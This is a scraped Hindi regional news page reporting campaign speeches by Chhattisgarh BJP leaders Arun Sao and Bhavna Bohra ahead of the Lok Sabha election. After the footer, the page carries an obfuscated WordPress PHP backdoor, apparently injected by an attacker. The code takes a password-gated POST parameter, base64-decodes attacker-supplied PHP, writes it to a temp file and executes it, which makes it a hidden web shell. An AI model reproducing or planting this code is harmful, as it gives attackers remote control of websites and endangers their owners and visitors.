कवर्धाछत्तीसगढ़राजनीति

देश की जनता को मोदी जी पर है पूर्ण विश्वास, अबकी बार 400 पार का लक्ष्य जरुर पूरा होगा : अरुण साव

मोदी जी के नेतृत्व में सेना, शिक्षा,सुरक्षा और सशक्तिकरण के साथ अंतरिक्ष में भी भारत अपना परचम लहरा रहा है : भावना बोहरा

कवर्धा।  रविवार को पंडरिया विधानसभा के अंतर्गत ग्राम कोदवागोडान में मुख्यमंत्री विष्णुदेव साय के विशाल जनसभा में शामिल होने के बाद उपमुख्यमंत्री अरुण साव और पंडरिया विधायक भावना बोहरा ने पंडरिया विधानसभा के ग्राम मोहतरा, महका एवं रूसे में जनसंपर्क किया। इस दौरान उन्होंने केंद्र व राज्य सरकार की योजनाओं से लाभान्वित लाभार्थियों से भी भेंट कर संवाद किया और 26 अप्रैल को होने वाले लोकसभा चुनाव में भाजपा को वोट देने की अपील की।

उपमुख्यमंत्री अरुण साव ने कहा कि देश की जनता को मोदी जी पर है पूर्ण विश्वास, अबकी बार 400 पार का लक्ष्य जरुर पूरा होगा। कांग्रेस के कुशासन में राजनांदगांव लोकसभा की जनता उपेक्षा और अपमान का बदला इस चुनाव में अपने मताधिकार से लेगी। कार्यकर्ताओं की मेहनत से विधानसभा चुनाव में ऐतिहासक जीत मिली है अब लोकसभा चुनाव में भी ऐसी ही धमाकेदार जीत दर्ज करनी है। पिछले पांच साल कांग्रेस शासनकाल में केंद्रीय योजनाओं का लाभ ग्रामीणों को नहीं मिल पा रहा था, लेकिन भाजपा की सरकार बनते ही प्रदेश की जनता को मोदी जी की योजनाओं का लाभ मिलना शुरू हो गया है। किसानों को दो वर्ष का बकाया धान बोनस प्रदान किया गया। सरकारी ख़र्च पर रामलला के दर्शन कराए जा रहे है। तेंदुपत्ता संग्राहकों चरण पादुका मिलना शुरू हो जाएगा। ये सभी भाजपा के सबका साथ सबका विकास के लक्ष्य से पूरा हो रहा है।

पंडरिया विधायक भावना बोहरा ने कहा कि पिछले 5 वर्षों में छत्तीसगढ़ जिस कुशासन,अराजकता और भ्रष्टाचार के दलदल में धंस रहा था उससे जनता भलीभांति परिचित थी और विधानसभा चुनाव में उन्होंने अपने मताधिकार से इसका जवाब दिया और छत्तीसगढ़ में सुशासन का सूर्योदय किया। आज महज 100 दिनों के अन्दर छत्तीसगढ़ की डबल इंजन की भाजपा सरकार ने मुख्यमंत्री  विष्णु देव साय जी के नेतृत्व में जो अभूतपूर्व कार्य किये हैं वो छत्तीसगढ़ में फिर से खुशहाली और जनता की समृद्धि के लिए नए अवसर लेकर आएगा। प्रधानमंत्री नरेंद्र मोदी जी ने राजनांदगांव लोकसभा के विकास और जन सुविधा के लिए कई विकास कार्यों की सौगात दी है। आवास योजना,उज्ज्वला योजना, ड्रोन दीदी, लखपति दीदी, आयुष्मान भारत जैसी योजनाओं के साथ ही वन्दे भारत एक्सप्रेस, डोंगरगढ़ मंदिर को प्रसाद योजना के तहत शामिल करना व सड़कों का जाल बिछाने जैसे कई विकास कार्य किया है। मोदी जी की गारंटी मतलब गारंटी पूरी होने की गारंटी है। इस बार छत्तीसगढ़ की सभी 11 सीटों में भाजपा का कमल आप सभी कार्यकर्ताओं की वजह से खिलेगा।

भावना बोहरा ने आगे कहा कि प्रधानमंत्री नरेन्द्र मोदी जी नये भारत की परिकल्पना के साथ देश को सुपरपावर बनाना चाहते है। प्रधानमंत्री जी समाज के हर वर्ग के उत्थान के लिए प्रयासरत है। राममंदिर निर्माण, धारा 370 व 35ए को खत्म करने और कोरोना काल में करोड़ों लोगों को निशुल्क वैक्सीन और खाद्यान्न उपलब्ध कराने जैसे ऐतिहासिक कार्यों को जनता नहीं भूली है और इसलिए इस बार और भी प्रचंड मतों के साथ नरेंद्र मोदी जी को फिर एक बार प्रधानमंत्री बनाने का संकल्प कर चुकी है। महतारी वंदन योजना से प्रदेश की 70 लाख विवाहित महिलाओं को 1000 रुपए उनके खातों में ट्रांसफर किया गया और प्रतिमाह 12 हजार की आर्थिक सहयता देने की घोषणा महिला सशक्तिकरण के पथ में ऐतिहासिक निर्णय है। आज इन सभी नीतियों,विकास कार्यों से भारत का विश्व में दमखम बढ़ा रहा है सैन्य शक्ति से लेकर अन्तरिक्ष तक भारत बुलंदियों का नया परचम लहरा रहा है, शिक्षा एवं खेल में हमारे युवा भारत का मान-सम्मान बढ़ा रहें हैं, बेटी बचाओ-बेटी पढ़ाओ अभियान से बेटियों को समाज में एक उचित स्थान मिल रहा है। देश का हर व्यक्ति,वर्ग और समाज इन नीतियों और विकास कार्यों का सहभागी बन रहा है इसलिए फिर तीसरी बार देश में मोदी सरकार बनने जा रहा है।

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
×

Powered by WhatsApp Chat

×
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}